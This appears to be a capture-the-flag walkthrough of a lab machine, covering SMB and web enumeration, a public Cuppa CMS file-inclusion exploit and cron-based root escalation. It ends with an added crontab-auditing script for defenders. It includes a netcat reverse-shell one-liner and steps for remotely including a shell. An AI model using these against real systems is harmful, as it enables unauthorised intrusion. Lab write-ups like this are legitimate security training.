Machine
Difficulty: Medium
Score: 5.5/10
Target
- 2 flags
- system privilege
Process
Enumeration
Scan ports using nmap
Let's use GoBuster to locate any directories!
SMB Service
SMBMap allows users to enumerate Samba share drives across an entire domain. It is available on all Kali Linux machines. If you don't have the time or resources to set up your own Kali Linux machine, you can deploy one and control it from within your browser.
The scan reveals a share called "anonymous" that has read access. Let's connect to the share and investigate.
smbclient //
Log1.txt contains possible passwords, and there is an SMB share called milesdyson. We have some potential credentials here... but SSH is disabled! What else can we do?
An earlier GoBuster scan revealed SquirrelMail!
Gasp! Reading his emails reveals a Samba password reset!
Let's log into Miles' share and see what interesting things we can find! You should find a file that gives you information about a new CMS.
smbclient //<ip>/milesdyson
If you use GoBuster on the /45kra24zxs28v3yd/ directory, you will reveal an /administrator page. This reveals a Cuppa CMS!
Looking at the source code will give you an indication of the CMS' version. After some online research, it turns out there is a public exploit for it: https://www.exploit-db.com/exploits/25971
Get a shell script, change the IP to your tun0 IP (ifconfig), host it locally using Python, use netcat to listen for a session, and then remotely include this shell on the web server.
Privilege Escalation
So the file /home/milesdyson/backups/backup.sh is being called every minute. Inspecting this file:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh
Then open up a netcat listener and you will receive a shell as root!
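The root escalation works because a root cron job runs a script that lives in a user's home directory. As an added defender-side example (not part of the original write-up), the script below audits crontab text for exactly that pattern: entries whose command references a path under /home/. The crontab content is constructed for the demo, and the function names are my own.

```bash
#!/bin/sh
# Added example: flag cron entries that execute anything under /home/.
# A root job pointing at a user-owned script (like backup.sh above) lets that
# user run code as root, so such entries deserve review or relocation to a
# root-owned directory such as /usr/local/sbin.

# Constructed sample of a system crontab (/etc/crontab layout: 5 time fields,
# user, command). Only the second line is the dangerous pattern.
SAMPLE_CRONTAB='# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * www-data /var/www/scripts/cleanup.sh'

# Print every non-comment crontab line whose command contains a /home/ path.
# Fields are checked from the 6th onward so both system crontabs (with a user
# column) and per-user crontabs (without one) are handled.
flag_home_cron_jobs() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # skip comments and blanks
        {
            for (i = 6; i <= NF; i++)
                if ($i ~ /^\/home\//) { print; break }
        }'
}

# Number of flagged entries; handy for a pass/fail check in a hardening script.
count_home_cron_jobs() {
    flag_home_cron_jobs "$1" | awk 'END { print NR }'
}

# Stand-alone run: audit the constructed sample, then the live system crontab
# if it is readable on this host.
flag_home_cron_jobs "$SAMPLE_CRONTAB"
if [ -r /etc/crontab ]; then
    flag_home_cron_jobs "$(cat /etc/crontab)"
fi
```

Run the same function over the contents of /etc/cron.d/* and `crontab -l` output as root to cover the other places a scheduled job can hide.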